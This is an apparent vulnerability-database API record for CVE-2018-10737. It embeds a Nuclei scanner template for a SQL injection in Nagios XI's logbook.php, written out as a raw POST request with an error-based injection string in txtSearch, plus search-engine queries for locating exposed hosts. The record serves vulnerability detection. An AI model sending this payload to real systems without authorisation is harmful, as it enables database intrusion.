{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-10737/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-10737/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-10737/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-10737/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-10737/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-10737"},"sightings":{"href":"/api/v1/sightings/cve-2018-10737"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.4205,"kev":false,"percentile":0.98633},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-10737.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2018-10737\n\ninfo:\n  name: NagiosXI <= 5.4.12 logbook.php SQL injection\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.\n  impact: |\n    Authenticated administrators can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire Nagios XI instance.\n  remediation: |\n    Upgrade to Nagios XI version 5.4.13 or later.\n  reference:\n    - https://vulners.com/seebug/SSV:97267\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-10737\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 7.2\n    cve-id: CVE-2018-10737\n    cwe-id: CWE-89\n    epss-score: 0.4205\n    epss-percentile: 0.98633\n    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: nagios\n    product: nagios_xi\n    shodan-query: http.title:\"nagios xi\"\n    fofa-query:\n      - app=\"Nagios-XI\"\n      - title=\"nagios xi\"\n      - app=\"nagios-xi\"\n    google-query: intitle:\"nagios xi\"\n  tags: cve,cve2018,nagios,sqli,vkev,vuln\nvariables:\n  num: \"{{rand_int(2000000000, 2100000000)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /nagiosql/admin/logbook.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{md5(num)}}\"\n# digest: 4a0a00473045022002f44613a56ebf39794a77fa92cf9995f257867a4dd823ed5131de6c2a1a34870221008224361c2369a9380f915be1f1ffeca45c1c3e829217730a78d579169e0219e8:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2018-10737"}